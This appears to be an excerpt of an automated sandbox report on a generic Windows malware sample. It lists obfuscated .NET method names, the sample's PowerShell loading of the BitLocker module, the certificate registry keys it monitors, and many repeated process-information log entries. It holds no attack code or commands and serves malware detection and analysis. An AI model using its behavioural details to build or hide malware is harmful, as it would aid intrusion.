Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
